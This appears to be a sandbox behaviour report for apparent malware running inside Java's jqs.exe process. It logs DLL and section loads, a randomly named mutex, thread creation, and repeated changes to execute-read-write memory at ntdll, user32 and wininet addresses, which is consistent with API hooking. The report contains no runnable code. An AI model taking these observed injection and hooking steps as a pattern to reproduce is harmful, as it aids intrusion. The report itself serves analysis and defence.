C:\Program Files\Java\jre6\bin\deploy.dll | query and write and read and execute | image | 6D1D0000 | 77824 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D1D0000 | 77824 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\fontmanager.dll | write and read and execute | commit | 10B0000 | 323584 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\fontmanager.dll | query and write and read and execute | image | 6D230000 | 323584 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D230000 | 323584 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\hpi.dll | write and read and execute | commit | 10B0000 | 16384 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\hpi.dll | query and write and read and execute | image | 6D280000 | 32768 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D280000 | 32768 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\java.dll | write and read and execute | commit | 10B0000 | 126976 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\java.dll | query and write and read and execute | image | 6D320000 | 126976 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D320000 | 126976 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\javaw.exe | write and read and execute | commit | 10B0000 | 147456 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\javaw.exe | query and write and read and execute | image | 10B0000 | 147456 | own pid | read write | conflicting addresses | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 10B0000 | 147456 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\jp2native.dll | write and read and execute | commit | 10B0000 | 8192 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\jp2native.dll | query and write and read and execute | image | 6D420000 | 24576 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D420000 | 24576 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\jpeg.dll | write and read and execute | commit | 10B0000 | 151552 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\jpeg.dll | query and write and read and execute | image | 6D440000 | 151552 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D440000 | 151552 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\net.dll | write and read and execute | commit | 10B0000 | 77824 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\net.dll | query and write and read and execute | image | 6D600000 | 77824 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D600000 | 77824 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\nio.dll | write and read and execute | commit | 10B0000 | 20480 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\nio.dll | query and write and read and execute | image | 6D620000 | 36864 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D620000 | 36864 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\regutils.dll | write and read and execute | commit | 10B0000 | 278528 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\regutils.dll | query and write and read and execute | image | 6D6A0000 | 286720 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D6A0000 | 286720 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\verify.dll | write and read and execute | commit | 10B0000 | 32768 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\verify.dll | query and write and read and execute | image | 6D7A0000 | 49152 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D7A0000 | 49152 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\zip.dll | write and read and execute | commit | 10B0000 | 49152 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\zip.dll | query and write and read and execute | image | 6D7E0000 | 61440 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D7E0000 | 61440 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\client\classes.jsa | query and read | commit | 10B0000 | 13369344 | own pid | readonly | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 10B0000 | 13369344 | own pid | readonly | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\awt.dll | write and read and execute | commit | 10B0000 | 1208320 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\awt.dll | query and write and read and execute | image | 6D000000 | 1351680 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D000000 | 1351680 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\client\jvm.dll | write and read and execute | commit | 10B0000 | 2695168 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\client\jvm.dll | query and write and read and execute | image | 6D7F0000 | 2777088 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D7F0000 | 2777088 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\dcpr.dll | write and read and execute | commit | 10B0000 | 143360 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\dcpr.dll | query and write and read and execute | image | 6D1A0000 | 143360 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D1A0000 | 143360 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\deploy.dll | write and read and execute | commit | 10B0000 | 77824 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\deploy.dll | query and write and read and execute | image | 6D1D0000 | 77824 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D1D0000 | 77824 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\fontmanager.dll | write and read and execute | commit | 10B0000 | 323584 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\fontmanager.dll | query and write and read and execute | image | 6D230000 | 323584 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D230000 | 323584 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\hpi.dll | write and read and execute | commit | 10B0000 | 16384 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\hpi.dll | query and write and read and execute | image | 6D280000 | 32768 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D280000 | 32768 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 77920000 | 995328 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
C:\Program Files\Java\jre6\bin\java.dll | write and read and execute | commit | 10B0000 | 126976 | own pid | execute | success or wait | 1
C:\Program Files\Java\jre6\bin\java.dll | query and write and read and execute | image | 6D320000 | 126976 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL | write and read and execute | unknown | 6D320000 | 126976 | own pid | read write | object name not found | 1
C:\WINDOWS\system32\setupapi.dll | query and write and read and execute | image | 77920000 | 995328 | own pid | read write | success or wait | 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\javaw.exe write and read and execute commit 10B0000 147456 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\javaw.exe query and write and read and execute image 10B0000 147456 own pid read write conflicting addresses 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 10B0000 147456 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\jp2native.dll write and read and execute commit 10B0000 8192 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\jp2native.dll query and write and read and execute image 6D420000 24576 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D420000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\jpeg.dll write and read and execute commit 10B0000 151552 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\jpeg.dll query and write and read and execute image 6D440000 151552 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D440000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\net.dll write and read and execute commit 10B0000 77824 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\net.dll query and write and read and execute image 6D600000 77824 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D600000 77824 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\nio.dll write and read and execute commit 10B0000 20480 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\nio.dll query and write and read and execute image 6D620000 36864 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D620000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\regutils.dll write and read and execute commit 10B0000 278528 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\regutils.dll query and write and read and execute image 6D6A0000 286720 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D6A0000 286720 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\verify.dll write and read and execute commit 10B0000 32768 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\verify.dll query and write and read and execute image 6D7A0000 49152 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7A0000 49152 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\zip.dll write and read and execute commit 10B0000 49152 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\zip.dll query and write and read and execute image 6D7E0000 61440 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7E0000 61440 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 1E70000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 77920000 995328 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 20A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown 22A0000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit 22A0000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 22A0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 22A0000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 22A0000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 22A0000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2376 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
2076 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
1208 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
684 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
2732 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
3228 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
3320 508 7C8106F9 false C:\Program Files\Java\jre6\bin\jqs.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
9078 0s success or wait 764 BAED21A
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
508 C:\Program Files\Java\jre6\bin\jqs.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
508 C:\Program Files\Java\jre6\bin\jqs.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
508 C:\Program Files\Java\jre6\bin\jqs.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
508 C:\Program Files\Java\jre6\bin\jqs.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
508 C:\Program Files\Java\jre6\bin\jqs.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
508 C:\Program Files\Java\jre6\bin\jqs.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
508 C:\Program Files\Java\jre6\bin\jqs.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D94D508 2000 page execute and read and write page execute and read and write success or wait 1 BAEEE64
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Section loaded Path: C:\Program Files\Java\jre6\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 11B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid success or wait 2102224889
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2102225153
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 1E70000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2102232285
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2102239112
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2102248525
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2102355457
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2102363090
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2102387370
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2102388961
Thread created PID: 508 TID: 2376 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2102413424
Thread delayed Time: 0 TID: 9078 success or wait 2102416932
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2102434889
System info queried Type: BasicInformation success or wait 2102435194
System info queried Type: ProcessorInformation success or wait 2102435493
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102435896
